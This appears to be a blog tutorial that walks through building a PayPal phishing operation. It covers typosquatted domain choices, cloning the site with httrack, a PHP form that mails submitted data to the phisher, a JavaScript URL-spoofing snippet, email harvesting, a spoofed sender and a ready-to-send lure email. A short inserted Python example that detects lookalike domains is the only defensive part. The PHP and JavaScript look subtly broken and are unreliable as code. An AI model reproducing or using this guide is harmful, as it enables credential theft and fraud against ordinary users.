Phishing Sites


A phishing site is a site designed to trick people into giving away important information. In most cases they try to get information to steal your identity. However, some more elaborate phishing sites can be set up to steal valuable company data for corporate espionage. In this post I will teach you how to set up a phishing scam. It is important to know this because if you know how it is done, then you will know how to protect yourself.

Planning the attack

All phishing sites are websites. In theory you don’t need a domain name. And if you use a domain name you can easily set up a DNS server. However, if your DNS server isn’t registered through ICANN then users will get a warning in their web browser. So what many phishers will do is try their best to be creative when purchasing a domain name.

Note: About 35% of the people I talk to don’t even look at the web browser’s address bar. So it could be easy enough to have a site that looks like another site and has a completely different domain name.

So let’s say our phishing scam is to make people believe that it is a Pay Pal website. Since Pay Pal owns paypal.com we can’t purchase it. But there is nothing stopping us from purchasing a domain name that looks similar and is also available. So we will now examine the letters in the domain name paypal.com.




One thing we notice is that paypal.com looks like paypa1.com. So we can check to see if it is available. As you can see, we use the number 1 for the L in paypal.com. We did this because the number 1 resembles the lower case letter L. So you can easily trick users in such ways.

Another trick we can use is knowing that most websites have subdomains, such as www.paypal.com or developer.paypal.com. So what we can do is register a domain such as login-paypal.com or login-paypa1.com. Because we have the dash it isn’t a subdomain, but it can also be deceiving.
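Seen from the defender's side, both naming tricks above (a digit standing in for a letter, and a hyphenated prefix that imitates a subdomain) can be flagged automatically in mail or proxy logs. The following is an added example, not code from the original post; the confusables table, function names and category labels are assumptions made for illustration.

```python
# Added example: classify a domain against a protected brand domain.
# CONFUSABLES is a small constructed sample, not a complete homoglyph list.
CONFUSABLES = str.maketrans({"1": "l", "0": "o", "3": "e", "5": "s"})

def registrable(domain: str) -> str:
    """Return the last two labels (naive: assumes a single-label TLD such as .com)."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def classify(candidate: str, brand: str = "paypal.com") -> str:
    """Label a domain as legitimate, a lookalike of the brand, or unrelated."""
    reg = registrable(candidate)
    if reg == brand:
        return "legitimate"                 # real subdomains end in the brand domain
    brand_name = brand.split(".")[0]
    name = reg.split(".")[0]
    normalized = name.translate(CONFUSABLES)  # undo digit-for-letter swaps
    substituted = normalized != name
    if normalized == brand_name:
        return "homoglyph" if substituted else "other-tld"
    # A hyphen keeps the brand name inside ONE label, so the domain is
    # not a subdomain of the brand even though it reads like one.
    if brand_name in normalized.split("-"):
        return "hyphenated-homoglyph" if substituted else "hyphenated-lookalike"
    return "unrelated"

if __name__ == "__main__":
    for d in ("developer.paypal.com", "paypa1.com",
              "login-paypal.com", "login-paypa1.com", "example.org"):
        print(f"{d:24} {classify(d)}")
```
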

Once we have picked out our domain name and purchased it, we are all set to start creating our phishing site.

Creating the Phishing Site

There are many ways of easily creating a website that looks exactly like the site we plan on phishing with. We could use our web browser, right click on the site and save it to our computer. If we are using Linux then we can also use the wget tool. However, in this post I will use HTTrack, mainly because of its speed and the fact that it is available for Windows, Mac, Linux, BSD & Solaris. So using HTTrack will work pretty much the same way regardless of your operating system. So let’s fetch the website’s data.




If we have HTTrack installed on our computer we can navigate to its location and type the following in our command prompt or terminal.


httrack "https://www.paypal.com" -O "somedir" "+*.paypal.com/*" -v

The above command will download the entire site to our computer. Depending on the size of the site this could take a while.

Once the site has finished downloading to our computer we can look at the source code of the site. We now can make changes as we please.

Some code we will want to modify is the login portion. Let’s change it to email us the username and password the user types. We will also want to have it redirect over to the official Pay Pal site’s wrong password page. This will make users think they mistyped the password and they will attempt to type it again.

<?php
if (isset($_REQUEST['email']))
//if "email" is filled out, send email
{
//send email
$email = $_REQUEST['email'] ;
$subject = $_REQUEST['subject'] ;
$message = $_REQUEST['message'] ;
mail("[email protected]", $subject,
$message, "From:" . $email);
$url = 'https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-submit';
}
else
//if "email" is not filled out, display the form
{
echo "<form method='post' action='mailform.php'>
Email: <input name='email' type='text' /><br />
Subject: <input name='subject' type='text' /><br />
Message:<br />
<textarea name='message' rows='15' cols='40'>
</textarea><br />
<input type='submit' />
</form>";
}
?>

Note: Even if a user types the wrong password on the phishing site we can make good guesses as to what it may be. Eventually we will have full access to the site.

Another thing worth mentioning is that at times there may be certain exploits for some web browsers that allow spoofing of URLs. Back during the days of Internet Explorer 5 there was an exploit that would do such a thing. And recently an exploit was discovered for the Safari mobile browser for iOS 5.1 (iPhone, iPod Touch, iPad). Such exploits can be used to a phisher’s advantage. So we could add the code to create this exploit.


<script type="text/javascript">
document.getElementById('one').onclick = function() {
myWindow=window.open('http://www.paypal.com','eintitel','width=200,height=100,location=yes');
myWindow.document.write("<html><head><script src='/google_analytics_auto.js'></script></head><body><iframe src=\"http://login-paypa1.com\");></iframe></scri+pt></body></html>");
myWindow.focus();
return false;
}
</script>

Once we have made our modifications we will upload our phishing site to a server. We can purchase hosting through a hosting provider or we can set up our own LAMP server.




Once the site has been uploaded we are all set to start phishing.

Getting Victims to come to our phishing site.

To get our victims to come to our site, we can do many different things. Some of the things we can do are listed below.

  • E-Mail the victim
  • Post a link online somewhere (Online support forums, blogs, social networks)
  • Attack the victim’s router and make it so every time he or she goes to Pay Pal they will get redirected to the phishing site
  • Write a piece of malware that modifies the victim’s hosts file

E-Mailing victims is the most common method of luring users to the phishing site. So we will do this. But first we will need a list of E-Mail addresses. This really isn’t a problem. People post their E-Mail addresses all over the web. So we just need an E-Mail harvester to harvest all of these E-Mail Addresses.

Note: Obviously not all of the E-Mails we collect will be addresses of people who have a Pay Pal account. But we won’t really care too much. The user will most likely know it is a phishing scam since they don’t have a Pay Pal account & they will just mark it as spam.

Once we have our list of E-Mails we will want to send a spoofed E-Mail. We will make the E-Mail look like it is coming from Pay Pal. So to do this we will have the from field say something like [email protected]. To make the address show up like this we will need one of two things.




Either an SMTP Server or a script that uses an SMTP server. We will use the second method to save us time. When sending the message we will write something like the following.

Dear Pay Pal User

The security department has noticed some suspicious activity from your account. Please log in to Pay Pal as soon as possible to check if any unauthorized charges have been made. We have provided the link to us in this E-Mail.

Link: login-paypa1.com

Another thing we can do is mask the link to make it look like it is going to go to Pay Pal’s Website. Of course this requires sending the mail in HTML view.

Dear Pay Pal User

The security department has noticed some suspicious activity from your account. Please log in to Pay Pal as soon as possible to check if any unauthorized charges have been made. We have provided the link to us in this E-Mail.

Link: login-paypal.com

And since we’re sending mail in HTML mode, let’s add the official Pay Pal logo.

 

Once the victim goes to our site we can see when, where and on what they looked at the site. More than enough info for us. And then once they type in their username and password we pretty much own them.
